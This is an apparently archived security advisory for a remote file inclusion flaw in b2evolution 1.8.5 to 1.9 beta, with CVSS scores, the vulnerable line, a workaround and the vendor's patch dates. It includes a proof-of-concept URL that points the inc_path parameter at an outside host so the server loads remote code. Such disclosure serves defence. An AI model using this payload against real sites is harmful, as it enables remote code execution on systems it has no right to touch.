b2evolution Remote File inclusion Vulnerability

2006.12.11
Credit: tarkus
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

_________________________________________ _________________________________________ Severity: High Title: b2evolution Remote File inclusion Vulnerability Date: 28.11.06 Author: tarkus (tarkus (at) tiifp (dot) org) Web: https://tiifp.org/tarkus Vendor: b2evolution (http://b2evolution.net/) Affected Product(s): b2evolution 1.8.5 - 1.9 beta - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Description: ------------ Line 67 of import-mt.php (blogs/inc/CONTROL/imports): > >require_once $inc_path.'MODEL/files/_file.funcs.php'; > PoC: ---- http://<victim>/<b2epath>/inc/CONTROL/import/import-mt.php?basepath= foo&inc_path=https://tiifp.org/tarkus/PoC/ register_globals and allow_url_fopen have to be On Workaround: ----------- Put the following line at the beginning of the file. if( !defined('EVO_MAIN_INIT') ) die( 'Please, do not access this page directly.' ); Vendor Response: ---------------- Reported to Vendor: 10.11.06 Vendor response: 10.11.06 Patch in CVS: 10.11.06


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top